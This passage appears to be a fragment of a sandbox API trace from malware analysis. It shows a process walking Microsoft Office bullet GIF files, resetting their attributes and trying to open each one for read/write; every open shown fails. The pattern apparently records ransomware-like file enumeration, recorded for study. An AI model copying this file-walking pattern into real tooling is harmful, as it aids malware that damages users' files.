office\\media\\office14\\bullets\\bd15133_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.883] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.883] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.884] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.884] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.884] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15134_.GIF", dwFileAttributes=0x80) returned 0 [0135.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15134_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15134_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.884] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.884] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.884] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.884] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.884] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15135_.GIF", dwFileAttributes=0x80) returned 0 [0135.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15135_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.885] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.885] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.885] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.885] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.885] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15136_.GIF", dwFileAttributes=0x80) returned 0 [0135.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15136_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15136_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.886] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.886] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.886] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.886] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.886] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15168_.GIF", dwFileAttributes=0x80) returned 0 [0135.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15168_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15168_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.886] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.886] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.886] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.886] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15169_.GIF", dwFileAttributes=0x80) returned 0 [0135.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15169_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.887] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.887] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.887] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.887] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.888] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15170_.GIF", dwFileAttributes=0x80) returned 0 [0135.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15170_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15170_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.888] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.888] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.888] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.888] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.888] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15171_.GIF", dwFileAttributes=0x80) returned 0 [0135.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15171_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.888] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.888] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.889] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.889] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.889] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15172_.GIF", dwFileAttributes=0x80) returned 0 [0135.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15172_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.889] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.889] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.889] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.889] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.889] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15173_.GIF", dwFileAttributes=0x80) returned 0 [0135.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15173_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15173_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.891] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.891] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.891] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.891] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15272_.GIF", dwFileAttributes=0x80) returned 0 [0135.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15272_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15272_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.891] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.891] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.891] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.891] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.892] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15273_.GIF", dwFileAttributes=0x80) returned 0 [0135.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15273_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15273_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.892] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.892] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.893] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.893] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.893] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15274_.GIF", dwFileAttributes=0x80) returned 0 [0135.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15274_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15274_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.893] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.893] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.893] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.893] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.893] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15275_.GIF", dwFileAttributes=0x80) returned 0 [0135.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15275_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15275_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.894] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.894] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.894] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.894] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.894] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15276_.GIF", dwFileAttributes=0x80) returned 0 [0135.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15276_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15276_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.894] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.894] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.894] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.894] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.895] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF", dwFileAttributes=0x80) returned 0 [0135.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD15277_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd15277_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.895] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.895] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.895] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.895] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.895] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF", dwFileAttributes=0x80) returned 0 [0135.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21294_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21294_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.896] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.896] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.896] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.896] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.896] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF", dwFileAttributes=0x80) returned 0 [0135.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21295_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21295_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.897] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.897] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.897] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.898] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.898] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21296_.GIF", dwFileAttributes=0x80) returned 0 [0135.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21296_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21296_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.898] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.898] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.898] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.898] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.899] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21297_.GIF", dwFileAttributes=0x80) returned 0 [0135.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21297_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21297_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.899] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.899] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.899] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.899] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.899] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21298_.GIF", dwFileAttributes=0x80) returned 0 [0135.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21298_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21298_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.900] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.900] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.900] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.900] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.900] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21299_.GIF", dwFileAttributes=0x80) returned 0 [0135.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21299_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21299_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.900] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.900] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.901] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.901] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21300_.GIF", dwFileAttributes=0x80) returned 0 [0135.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21300_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21300_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.901] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.901] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.901] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.901] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21301_.GIF", dwFileAttributes=0x80) returned 0 [0135.902] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21301_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21301_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.902] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.902] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.902] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.902] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.902] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21302_.GIF", dwFileAttributes=0x80) returned 0 [0135.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21302_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21302_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.903] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.903] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.903] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.903] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.903] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF", dwFileAttributes=0x80) returned 0 [0135.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21304_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21304_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.903] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.903] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.903] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.904] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.904] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21306_.GIF", dwFileAttributes=0x80) returned 0 [0135.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21306_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21306_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.904] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.904] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.905] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.905] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21308_.GIF", dwFileAttributes=0x80) returned 0 [0135.905] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21308_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21308_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.905] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.905] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.905] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.905] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21310_.GIF", dwFileAttributes=0x80) returned 0 [0135.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21310_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21310_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.906] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.906] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.906] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0135.906] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.907] 